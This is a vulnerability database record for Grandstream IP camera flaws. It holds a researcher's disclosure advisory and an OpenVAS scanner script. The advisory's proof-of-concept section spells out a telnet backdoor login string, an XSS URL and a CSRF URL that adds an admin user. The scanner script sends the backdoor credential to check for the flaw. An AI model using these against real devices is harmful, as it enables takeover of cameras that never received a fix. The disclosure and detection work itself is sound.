ID CVE-2013-3962 Type cve Reporter cve@mitre.org Modified 2013-10-02T17:28:00
Description
Cross-site scripting (XSS) vulnerability in Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models before firmware 1.0.4.44 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
Related records

packetstorm: PACKETSTORM:122004
title: Grandstream Backdoor / Cross Site Request Forgery / Cross Site Scripting
type: packetstorm | bulletinFamily: exploit
published: 2013-06-13 | modified: 2013-06-13 | lastseen: 2016-12-05T22:18:16
cvelist: CVE-2013-3962, CVE-2013-3963, CVE-2013-3542
cvss: 6.8 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
href: https://packetstormsecurity.com/files/122004/Grandstream-Backdoor-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
sourceHref: https://packetstormsecurity.com/files/download/122004/grandstream-backdoorxssxsrf.txt

sourceData:

===============================================================================
GRANDSTREAM
===============================================================================

1.Advisory Information
Title: Grandstream Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
The following vulnerabilities have been found in these devices:
-CVE-2013-3542. Backdoor in Telnet Protocol (CAPEC-443)
-CVE-2013-3962. Cross Site Scripting (CWE-79)
-CVE-2013-3963. Cross Site Request Forgery (CWE-352) and Clickjacking (CAPEC-103)

3.Affected Products
The following products are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500.
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963.
It's possible other models are affected but they were not checked.

4.PoC
4.1.Backdoor in Telnet Protocol
CVE-2013-3542, Backdoor in Telnet Protocol
You should connect via telnet protocol to any affected camera (it's open by default).
After that you should introduce the magic string "!#/" as Username and as Password.
You will get the admin panel setting menu. If you type "help", the following commands are shown:
=======================================================
help, quit, status, restart, restore, upgrade, tty_test
=======================================================
@@@ restore (Reset settings to factory default)

The attacker can take control of the device, which makes these devices very vulnerable.

4.2.Cross Site Scripting (XSS)
CVE-2013-3962, Cross Site Scripting non-persistent.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________

4.3.Cross Site Request Forgery (CSRF)
CVE-2013-3963, CSRF via GET method.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
You should introduce the following URL to replicate the attack.
_____________________________________________________________________________
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
_____________________________________________________________________________

5.Credits
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero Castillo.

6.Report Timeline
-2013-05-31: Students open a ticket in order to notify the Grandstream Customer Support of CVE-2013-3542.
-2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability.
-2013-06-11: Students open a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities.

openvas: OPENVAS:1361412562310103737
title: Grandstream Devices Backdoor in Telnet Protocol
type: openvas | bulletinFamily: scanner
published: 2013-06-11 | modified: 2020-03-24 | lastseen: 2020-03-24T19:05:40
cvelist: CVE-2013-3962, CVE-2013-3963, CVE-2013-3542
description: The remote Grandstream device has the default telnet user and password
cvss: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
href: http://plugins.openvas.org/nasl.php?oid=1361412562310103737

sourceData (NASL):

###############################################################################
# OpenVAS Vulnerability Test
#
# Grandstream Devices Backdoor in Telnet Protocol
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (C) 2013 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103737");
  script_version("2020-03-24T06:41:42+0000");
  script_cve_id("CVE-2013-3542", "CVE-2013-3962", "CVE-2013-3963");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");

  script_name("Grandstream Devices Backdoor in Telnet Protocol");

  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2013/Jun/84");

  script_tag(name:"last_modification", value:"2020-03-24 06:41:42 +0000 (Tue, 24 Mar 2020)");
  script_tag(name:"creation_date", value:"2013-06-11 14:29:08 +0200 (Tue, 11 Jun 2013)");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Default Accounts");
  script_copyright("Copyright (C) 2013 Greenbone Networks GmbH");
  script_dependencies("telnetserver_detect_type_nd_version.nasl", "gb_default_credentials_options.nasl");
  script_require_ports("Services/telnet", 23);
  script_exclude_keys("default_credentials/disable_default_account_checks");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the
  disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to
  upgrade to a newer release, disable respective features, remove the product or replace the product by
  another one.");

  script_tag(name:"solution_type", value:"WillNotFix");
  script_tag(name:"summary", value:"The remote Grandstream device has the default telnet user and password '!#/'.");
  exit(0);
}

# Honour the scanner-wide switch that disables default-account checks.
if(get_kb_item("default_credentials/disable_default_account_checks"))
  exit(0);

include("telnet_func.inc");
include("misc_func.inc");

port = telnet_get_port( default:23 );

soc = open_sock_tcp(port);
if(!soc)
  exit(0);

# The banner must identify a Grandstream device and prompt for a username.
buf = recv(socket:soc, length:512);

if("grandstream" >!< buf || "Username" >!< buf)
  exit(0);

up = '!#/';

# Send the backdoor string as the username, then again as the password.
send(socket:soc, data:up + '\r\n');
ret = recv(socket:soc, length:512);

if("Password" >!< ret)
  exit(0);

send(socket:soc, data:up + '\r\n');
ret = recv(socket:soc, length:512);

close(soc);

# Reaching the device shell prompt confirms the backdoor credentials work.
if("Grandstream>" >< ret) {
  security_message(port:port);
  exit(0);
}

exit(0);